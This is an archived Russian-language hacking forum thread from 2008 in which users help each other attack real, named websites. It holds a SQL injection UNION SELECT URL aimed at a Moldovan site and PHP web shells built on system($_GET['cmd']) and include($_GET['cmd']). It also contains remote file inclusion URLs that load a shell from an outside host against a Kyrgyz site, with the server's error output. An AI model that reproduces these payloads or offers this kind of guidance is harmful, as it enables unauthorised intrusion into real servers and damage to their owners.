ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.04.2008, 17:27
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
там 7 столбцов 100% ..
как подбирать ?
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7+from+<table>/* где <table> самые распространенные имена, правильно? |
|
|
23.04.2008, 17:48
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
nicusor, правильно. Есть ещё такая штука - посимвольный подбор.
|
|
|
|
23.04.2008, 18:08
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
nicusor
Друг мой. Интересно зачем задавать вопрос, если не слушать ответа на него?
Специально для тебя я привёл ссылку , пройдя по которой ты увидишь вывод из таблицы
Правда в моей ссылке(как впрочем и в базе) полей 8 и если ты догадаешься убрать из неё пробелы будет гораздо проще
Последний раз редактировалось jokester; 23.04.2008 в 18:44..
|
|
|
|
23.04.2008, 18:25
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Пробывал залить шелл на этот сайт. Почему пишет Warning: system() [function.system]: Cannot execute a blank command in http://site.com/script.php on line 1
В скрипте обычный вызов функции систем().Пробывал с кавычками и без них)
<?php system($_GET['cmd']); ?>
|
|
|
|
23.04.2008, 18:26
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
это значит system отключено, юзай include
|
|
|
|
23.04.2008, 18:28
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от GrAmOzEkA
это значит system отключено, юзай include
это значит, что нужно писать
<?php @system($_GET['cmd']); ?>
|
|
|
|
23.04.2008, 18:31
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
это значит, что нужно писать
имхо include удобнее =), да систем почти всегда отключен.
<?php include($_GET['cmd']); ?>
www.site.com/index.php?cmd=http://shell.ru/shell.txt
|
|
|
|
23.04.2008, 18:33
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
@system сработало.вот только что делать дальше не пойму))))
|
|
|
|
23.04.2008, 18:35
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Хых,самое интересное что инклудить пытался так до того,как ты написал(дошло!:Р),но чёт не вышло.зато @system ошибок не вызвало.знач работает)
|
|
|
|
23.04.2008, 19:01
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.kat.kg/index.php?file=http://site.com/shell.php?cmd=ls+-la
Warning: forma_2(http://site.com/shell.php?cmd=ls -la) [function.forma-2]: failed to open stream: HTTP request failed! <html> in /usr/local/www/data-dist/kat/index_rus.inc on line 397
Fatal error: forma_2() [function.require]: Failed opening required 'http://site.com/shell.php?cmd=ls -la' (include_path='.') in /usr/local/www/data-dist/kat/index_rus.inc on line 397
И чойто я хз...Какой-то НТТР запрос чтоль не прокатил?)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
